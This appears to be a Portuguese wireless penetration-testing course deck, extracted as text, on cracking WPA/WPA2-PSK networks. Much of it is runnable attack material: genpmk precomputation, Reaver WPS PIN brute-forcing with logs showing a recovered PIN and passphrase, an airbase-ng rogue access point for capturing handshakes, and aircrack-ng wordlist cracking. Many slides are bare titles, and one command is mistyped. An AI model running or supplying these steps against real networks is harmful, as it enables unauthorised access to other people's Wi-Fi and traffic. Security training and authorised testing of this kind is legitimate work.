Wireless Pentest

WPA & WPA2

Instrutor

Marcos Pitanga
marcos.pitanga@gmail.com

Wireless Protected Access

Um pouco mais de teoria

WPA - Pre-Shared Key

WPA - Pre-Shared Key

Um pouco mais de teoria

Um pouco mais de teoria

Ataque WPA

Ataque WPA

Ataque WPA

Ataque WPA

Ataque WPA

Decriptando WPA - PSK

WPA2 - PSK

Usa os mesmos princpios do WPA

A fraqueza baseada na frase escolhida
Mais nada a ser dito !!!!!
Procedimento igual ao anterior

Acelerando o processo de Cracking

Ns podemos pr-calcular a PMK para um dado SSID e uma
wordlist usando a ferramenta genpmk
genpmk -f /pentest/passwords/wordlists/darkc0de. lst -d
PMK-Wireless-Lab -s "Wireless Lab
Vamos criar uma rede WPA-PSK com a senha skysign e
capture o WPA-handshake desta rede

Acelerando o processo de Cracking

Mea o tempo levado com aircrack

e compare

Usando PMK com aircrack

Pyrit para sistemas MultiCPU

Como o Reaver funciona?

Explora a vulnerabilidade no WPS Wi-Fi Protected Setup (WPS)

Fora bruta em PINs para relevar as senhas do WPA ou WPA2
Leva de 4 a 10 horas
No funciona em todos os APs

Crackeando via Reaver

1)airmon-ng start wlan0
2) airodump-ng mon0
No outro terminal
3) root@bt:~# reaver -c 11 -a -i mon0 -b 34:08:04:C0:B6:4E -vv
Reaver v1.4 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>
[+] Waiting for beacon from 34:08:04:C0:B6:4E
[+] Switching mon0 to channel 11
[+] Associated with 34:08:04:C0:B6:4E (ESSID: multipinguim-2)
[+] Trying pin 12345670
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[!] WARNING: Receive timeout occurred
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x02), re-trying last pin
[+] Trying pin 12345670
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message

Crackeando via Reaver

root@bt:~# reaver -S -c 11 -a -i mon0 -b 34:08:04:C0:B6:4E -v
Reaver v1.4 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>
[+] Waiting for beacon from 34:08:04:C0:B6:4E
[+] Associated with 34:08:04:C0:B6:4E (ESSID: multipinguim-2)
[+] Trying pin 12345670
[+] Trying pin 00005678
[+] Trying pin 01235678
[+] Trying pin 11115670
[+] Trying pin 22225672
[+] Trying pin 33335674
[+] 0.05% complete @ 2012-05-07 20:43:57 (3 seconds/pin)
[+] Trying pin 44445676
[+] Trying pin 55555678
[+] Trying pin 66665670
[+] Trying pin 77775672
[+] Trying pin 88885674
[+] 0.10% complete @ 2012-05-07 20:44:14 (3 seconds/pin)
[+] Trying pin 99995676
[+] Trying pin 00015677
[+] Trying pin 00025676
[+] Trying pin 00035675

Crackeando via Reaver

root@bt:~# reaver -S -c 11 -a -i mon0 -b 34:08:04:C0:B6:4E -vv -p 22838353

Reaver v1.4 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>

[+] Switching mon0 to channel 11

[+] Waiting for beacon from 34:08:04:C0:B6:4E
[+] Associated with 34:08:04:C0:B6:4E (ESSID: multipinguim-2)
[+] Trying pin 22838353
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
[+] Received M5 message
[+] Sending M6 message
[+] Received M7 message
[+] Sending WSC NACK
[+] Sending WSC NACK
[+] Pin cracked in 3 seconds
[+] WPS PIN: '22838353'
[+] WPA PSK: 'DECADA1234'
[+] AP SSID: 'multipinguim-2'
[+] Nothing done, nothing to save.

Conectando a uma rede WPA

wpa-supp.conf

Conectando a uma rede WPA

Cracking AP-less WPA Personal

Para fazermos um crack no WPA precisamos do 4 handshake:

Authenticator Nounce, Supplicante Nounce, Authenticator MAC, Supplicant
MAC.
S que para este ataque no precisamos de todos estes pacotes:
Ou pacote 1 & 2 ou pacotes 2 & 3

Para crackear precisamos ento do WPA-PSK honeypot para ento

ele conectar-se, somente precisamos da msg 1 e msg 2.
No precisamos saber nenhuma frase secreta ;-)

Cracking AP-less WPA Personal

1) Configurando nosso honeypot
airbase-ng -c 3 -a <AP> -e Wireless Lab -W 1 -z 2 mon0
2) Iniciamos o airodump
airodumo-ng -c 3 bssid <AP> --write sem-AP-WPA-cracking mon0
3) Volte a tela do airbase e observe os clientes se associando
4) Volte a tela do airodump e veja se pegou o WPA Handshake
5) Rode o aircrack agora
aircrack-ng -w wordlist.txt -b <AP> sem-AP-WPA-cracking-01.cap